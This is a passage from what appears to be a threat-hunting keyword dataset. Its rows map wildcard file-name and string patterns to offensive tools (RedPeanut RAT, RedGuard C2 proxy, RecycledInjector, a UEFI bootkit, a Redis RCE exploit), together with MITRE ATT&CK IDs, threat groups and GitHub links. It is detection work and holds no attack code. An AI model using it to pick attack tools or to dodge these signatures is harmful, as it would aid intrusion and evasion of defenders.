- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-Domain*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-LocalGroups*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-SPNs*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-Users.*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*recon-archy analyse*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy build*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy crawl*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy-master*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*ReconUserGroupRoles.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*RecycledInjector.exe*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RecycledInjector-main*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RecycledInjector-main*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RED_HAWK*,offensive_tool_keyword,red_hawk,Vulnerability Scanning and Crawling. A must have tool for all penetration testers.,T1190 - T1059 - T1595,TA0001 - TA0009,N/A,N/A,Information Gathering,https://github.com/Tuhinshubhra/RED_HAWK,1,0,N/A,N/A,10,2611,837,2022-05-31T12:08:19Z,2017-06-11T05:02:35Z -*Red-Baron*,offensive_tool_keyword,Red-Baron,Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.,T1583 - T1078 - T1027 - T1135,TA0002 - TA0003 - TA0040,N/A,N/A,Frameworks,https://github.com/byt3bl33d3r/Red-Baron,1,0,N/A,N/A,4,362,72,2020-03-05T07:19:43Z,2018-08-23T18:25:07Z -*redelk_backend_name_c2*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*redelk_backend_name_decoy*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*RedGuard.log*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*RedGuard/core*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*RedGuard_x64.exe*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*RedGuard_x86.exe*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*redhuntlabs*,offensive_tool_keyword,redhuntlabs,documentation for offensive operation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/redhuntlabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*redhuntlabs/BucketLoot*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*RedHunt-OS*,offensive_tool_keyword,RedHunt-OS,Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment,T1583 - T1057 - T1016,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/redhuntlabs/RedHunt-OS,1,1,N/A,N/A,10,1170,185,2020-07-13T04:54:49Z,2018-03-14T19:31:16Z -*redis-rce*,offensive_tool_keyword,redis-rce,A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Exploitation tools,https://github.com/Ridter/redis-rce,1,0,N/A,N/A,9,856,216,2021-11-30T14:55:59Z,2019-07-08T14:05:30Z -*redlotus.efi*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*RedPeanut Smb server started*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanut.Models*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*redpeanut.pfx*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanut.Resources.*.txt,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanut.Utility*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.C2*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.Core*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.Evasion*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.Execution*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutAgent.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutC2*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutCLI*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutDBContext*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutDBInitializer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutHtaPowerShellScript*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutHtaScript.hta*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutInstallUtil.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutMigrate.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutMSBuildScript.xml*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutPowershellScriptS*,offensive_tool_keyword,RedPeanut,RedPeanut is a 